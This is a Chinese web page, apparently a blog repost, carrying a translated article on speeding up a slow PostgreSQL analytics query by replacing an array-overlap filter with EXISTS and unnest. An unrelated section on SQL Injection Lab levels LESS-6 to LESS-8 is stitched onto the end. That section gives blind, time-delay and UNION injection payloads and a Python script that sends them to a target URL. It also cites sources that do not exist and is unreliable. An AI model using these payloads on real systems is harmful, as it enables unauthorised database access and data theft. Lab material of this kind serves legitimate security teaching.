sql查询时间大于某一时间_查询时间从24分钟到2秒钟:记一次神奇的SQL优化

d6a02ae33fa01627c202bcd5717dfe25.png  作者 | VWO译者 | 无明编辑 | Vincent AI 前线导读:去年十二月份,VWO 平台支持团队发布了一份缺陷报告。这份报告很有意思,其中有一个来自某家企业用户的分析查询,它的运行速度非常慢。本文作者是这个数据平台的一员,所以立马开始着手诊断这个问题。 更多优质内容请关注微信公众号“AI 前线”(ID:ai-front) 背   景

首先,我觉得有必要介绍一下 VWO(https://vwo.com/)平台。人们可以在这个平台上运行各种与他们的网站有关的工作负载,比如 A/B 测试、跟踪访问用户、转换、漏斗分析、渲染热点图、重放访问用户步骤,等等。

这个平台真正强大的地方在于它所提供的报告。如果没有这个平台,即使企业用户收集了大量数据也是毫无用处的,因为他们无法从数据中获取洞见。

有了这个平台,用户可以针对海量数据执行各种复杂的查询,比如下面这个:  

Show all clicks by visitors on webpage "abc.com"
FROM <date d1> TO <date d2>
for people who were either
using Chrome as a browser OR 
(were browsing from Europe AND were using iPhone devices)

请注意查询中的布尔运算符,查询接口为用户提供了这些东西,他们可以随意运行复杂的查询来获得想要的数据。

慢查询

这个用户执行的查询从表面上看应该是很快的:  

Show me all session recordings 
for users who visited any webpage 
containing the url that matches the pattern "/jobs"

这个网站的流量是非常巨大的,我们保存了数百万个唯一的 URL。这个用户想要查询符合他们业务需求的 URL。

初步诊断

现在让我们来看看在数据库方面都发生了什么。下面是相应的 SQL 语句:  

SELECT 
count(*) 
FROM 
acc_{account_id}.urls as recordings_urls, 
acc_{account_id}.recording_data as recording_data, 
acc_{account_id}.sessions as sessions 
WHERE 
recording_data.usp_id = sessions.usp_id 
AND sessions.referrer_id = recordings_urls.id 
AND ( urls && array(select id from acc_{account_id}.urls where url ILIKE '%enterprise_customer.com/jobs%')::text[] ) 
AND r_time > to_timestamp(1542585600) 
AND r_time < to_timestamp(1545177599) 
AND recording_data.duration >=5 
AND recording_data.num_of_pages > 0 ;

这是它的执行时间:  

Planning time: 1.480 ms
Execution time: 1431924.650 ms

这个语句查询的行数在 15 万行左右。查询计划显示了一些信息,但还不能看出瓶颈出在哪里。

我们再来进一步分析一下查询语句。这个语句连接了三张表:  

  1. sessions:用于展示会话信息的表,例如 browser、user-agent、country,等等。

  2. recording_data:记录 url、页面、时间段,等等。

  3. urls:为了避免出现重复的 url,我们使用单独的表对 url 进行了规范化。

另外请注意,我们使用 account_id 对这三表进行了分区,所以不可能出现因为某些账号记录过多导致性能变慢的情况。

寻找线索

经过进一步排查,我们发现这个查询有一些不一样的地方。比如下面这行:  

urls && array(
select id from acc_{account_id}.urls 
where url ILIKE '%enterprise_customer.com/jobs%'
)::text[]

最开始我认为针对所有长 URL 执行“ILIKE”操作是导致速度变慢的元凶,但其实并不是!  

SELECT id FROM urls WHERE url ILIKE '%enterprise_customer.com/jobs%';
id
--------
...
(198661 rows)

Time: 5231.765 ms

模式匹配查询本身只花了 5 秒钟,所以要匹配数百万个 URL 显然并不是个问题。

第二个可疑的地方是 JOIN 语句,或许是大量的连接操作导致速度变慢?一般来说,如果查询速度变慢,我们首先会认为连接操作是罪魁祸首,但对于目前这个情况,我不认为是这样的。  

analytics_db=# SELECT
count(*)
FROM
acc_{account_id}.urls as recordings_urls,
acc_{account_id}.recording_data_0 as recording_data,
acc_{account_id}.sessions_0 as sessions
WHERE
recording_data.usp_id = sessions.usp_id
AND sessions.referrer_id = recordings_urls.id
AND r_time > to_timestamp(1542585600)
AND r_time < to_timestamp(1545177599)
AND recording_data.duration >=5
AND recording_data.num_of_pages > 0 ;
count
-------
8086
(1 row)

Time: 147.851 ms

看,JOIN 操作实际上是很快的。

缩小可疑范围

我开始调整查询语句,尽一切可能提升查询性能。我和我的团队想出了两个方案。

针对子查询使用 EXISTS:我们想要进一步确认问题是不是出在 URL 子查询上。一种方法是使用 EXISTS,它会在找到第一条匹配记录时就返回,对性能提升很有帮助。  

SELECT
   count(*) 
FROM 
   acc_{account_id}.urls as recordings_urls,
   acc_{account_id}.recording_data as recording_data,
   acc_{account_id}.sessions as sessions
WHERE
   recording_data.usp_id = sessions.usp_id
AND ( 1 = 1 )
AND sessions.referrer_id = recordings_urls.id
AND (exists(select id from acc_{account_id}.urls where url ILIKE '%enterprise_customer.com/jobs%'))
AND r_time > to_timestamp(1547585600)
AND r_time < to_timestamp(1549177599)
AND recording_data.duration >=5
AND recording_data.num_of_pages > 0 ;
   count
   32519
   (1 row)
Time: 1636.637 ms

使用了 EXISTS 后,速度变快了很多。那么问题来了,为什么 JOIN 查询和子查询都很快,但放在一起就变得这么慢呢?

将子查询移到 CTE 中:如果子查询本身很快,我们可以预先计算结果,然后再传给主查询。  

WITH matching_urls AS (
    select id::text from acc_{account_id}.urls where url ILIKE '%enterprise_customer.com/jobs%'
)

SELECT 
   count(*) FROM acc_{account_id}.urls as recordings_urls, 
   acc_{account_id}.recording_data as recording_data, 
   acc_{account_id}.sessions as sessions,
   matching_urls
WHERE 
   recording_data.usp_id = sessions.usp_id 
   AND ( 1 = 1 ) 
   AND sessions.referrer_id = recordings_urls.id
   AND (urls && array(SELECT id from matching_urls)::text[])
   AND r_time > to_timestamp(1542585600) 
   AND r_time < to_timestamp(1545107599)
   AND recording_data.duration >=5 
   AND recording_data.num_of_pages > 0;

但这样仍然很慢。

寻找元凶

还有个地方之前一直被我忽略了,但因为没有其他办法了,所以我决定看看这个地方,那就是 && 运算符。既然 EXISTS 对性能提升起到了很大作用,那么剩下的就只有 && 可能会导致查询变慢了。

&& 被用来找出两个数组的公共元素。

初始查询中的 && 是这样的:  

AND ( urls && array(select id from acc_{account_id}.urls where url ILIKE '%enterprise_customer.com/jobs%')::text[] )

我们对 URL 进行了模式匹配,然后与所有 URL 进行交集操作。这里的“urls“并不是指包含了所有 URL 的表,而是 recording_data 的”urls“列。

因为现在对 && 有所怀疑,我使用 EXPLAIN ANALYZE 对查询语句进行了分析。  

Filter: ((urls && ($0)::text[]) AND (r_time > '2018-12-17 12:17:23+00'::timestamp with time zone) AND (r_time '2018-12-18 23:59:59+00'::timestamp with time zone) AND (duration >= '5'::double precision) AND (num_of_pages > 0))
Rows Removed by Filter: 52710

因为有好多行 &&,说明它被执行了好几次。

我通过单独执行这些过滤条件确认了是这个问题。

SELECT 1
FROM 
  acc_{account_id}.urls as recordings_urls, 
  acc_{account_id}.recording_data_30 as recording_data_30, 
  acc_{account_id}.sessions_30 as sessions_30 
WHERE 
  urls && array(select id from acc_{account_id}.urls where url ILIKE '%enterprise_customer.com/jobs%')::text[]

这个查询的 JOIN 很快,子查询也很快,所以问题出在 && 上面。

解决方案

&& 之所以很慢,是因为两个集合都很大。如果我把 urls 替换成{"http://google.com/","http://wingify.com/"},这个操作就很快。

我开始在谷歌上搜索如何在 Postgre 中不使用 && 进行交集操作,但并没有找到答案。

最后,我们决定这样做:获取所有匹配的 urls 行,像下面这样:  

SELECT urls.url
FROM 
  acc_{account_id}.urls as urls,
  (SELECT unnest(recording_data.urls) AS id) AS unrolled_urls
WHERE
  urls.id = unrolled_urls.id AND
  urls.url ILIKE '%jobs%'

这里没有使用 JOIN 语句,而是使用了一个子查询,并展开 recording_data.urls 数组,这样就可以直接在 where 语句中应用查询条件。

这里的 && 用来判断一个给定的 recording 是否包含匹配的 URL。它会遍历数组(或者说表中的行),在条件满足时立即停止,这个看起来是不是跟 EXISTS 很像?

因为我们可以在子查询之外引用 recording_data.urls,在必要时可以使用 EXISTS 来包装子查询。

把所有的东西放在一起,我们就得到了最终这个优化的查询:  

SELECT 
  count(*) 
FROM 
  acc_{account_id}.urls as recordings_urls, 
  acc_{account_id}.recording_data as recording_data, 
  acc_{account_id}.sessions as sessions 
WHERE 
  recording_data.usp_id = sessions.usp_id 
  AND ( 1 = 1 ) 
  AND sessions.referrer_id = recordings_urls.id 
  AND r_time > to_timestamp(1542585600) 
  AND r_time < to_timestamp(1545177599) 
  AND recording_data.duration >=5 
  AND recording_data.num_of_pages > 0
  AND EXISTS(
   SELECT urls.url
   FROM 
     acc_{account_id}.urls as urls,
     (SELECT unnest(urls) AS rec_url_id FROM acc_{account_id}.recording_data) 
   AS unrolled_urls
   WHERE
     urls.id = unrolled_urls.rec_url_id AND
     urls.url ILIKE '%enterprise_customer.com/jobs%'
   );

这个查询的执行时间为 1898.717 毫秒,是不是值得庆祝一下?

等等,我们还要验证一下结果是不是对的。我对 EXISTS 有所怀疑,因为它有可能会改变查询逻辑,导致过早地退出。我们要确保不会在查询中引入新的 bug。

我们对慢查询和快查询结果进行了 count(*) 比较,不同数据集的查询结果都是一致的。对于一些较小的数据集,我们还手动比对了具体数据,也没有问题。

学到的教训

在这次性能排查过程中,我们学到了这些东西:  

  1. 查询计划并不会告诉我们所有东西,但还是很有用的;

  2. 越是明显的疑点越不太可能是元凶;

  3. 一个慢查询可能包含多个单独的瓶颈点;

  4. 并非所有优化都是可简化的;

  5. 在可能的地方使用 EXISTS 来获得大幅性能提升。

结   论

我们将一个查询的运行时间从 24 分钟降到了 2 秒钟,一个不可思议的性能提升!我们花了 1 个半到 2 个小时的时间来优化和测试这个查询。SQL 其实是一门非常神奇的语言,只要你放开心态去拥抱它。

英文原文:

https://parallelthoughts.xyz/2019/05/a-tale-of-query-optimization/

23a9bb75bd547f4a6693d5295a4a8c0e.png

你也「在看」吗??

### SQL Injection Lab LESS-6 到 LESS-8 的相关内容 #### 关于 LESS-6 LESS-6 是一个基于布尔型盲注的实验场景。在这个实验中,攻击者通过判断页面返回的结果来推测数据库中的数据是否存在特定字符或数值。通常情况下,这种类型的注入会利用条件语句 `AND` 或 `OR` 来控制查询逻辑。 例如,在 LESS-6 中可能需要构造如下 payload: ```sql ' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 97 -- ``` 上述 Payload 将逐位猜测数据库名称的第一个字母是否大于某个 ASCII 值[^1]。 #### 关于 LESS-7 LESS-7 主要涉及时间延迟型盲注(Time-Based Blind SQL Injection)。在这种模式下,攻击者无法直接从响应内容中获取反馈,而是通过观察服务器响应的时间差异来进行推理。常用的函数包括 `SLEEP()` 和 `BENCHMARK()`。 下面是一个典型的 Time-Based 注入例子: ```sql ' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>97,SLEEP(5),NULL) -- ``` 此 Payload 使用了 MySQL 的 `IF` 函数以及 `SLEEP` 方法让服务器在满足条件下暂停几秒钟[^2]。 #### 关于 LESS-8 LESS-8 属于联合查询注入(Union-based SQL Injection),它允许攻击者将额外的数据附加到原始查询结果上并显示出来。为了成功执行 Union 查询,两个 SELECT 子句必须具有相同数量列数及其对应字段类型兼容。 举个简单的实例: ```sql 1 UNION ALL SELECT null,null,database()-- ``` 这里我们假设原查询有两列,则新添加部分也需匹配相应结构以便正常渲染网页上的信息[^3]。 ```python import requests url = 'http://example.com/vulnerable_page' payloads = [ "' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 97 --", "' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))>97,SLEEP(5),NULL) --", "1 UNION ALL SELECT null,null,database()--" ] for p in payloads: response = requests.get(url + "?id=" + p) if "sleep" in p and response.elapsed.total_seconds() >= 5: print(f"[+] Detected time delay with {p}") elif any(keyword in response.text for keyword in ["error", "union"]): print(f"[+] Possible vulnerability detected using {p}") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值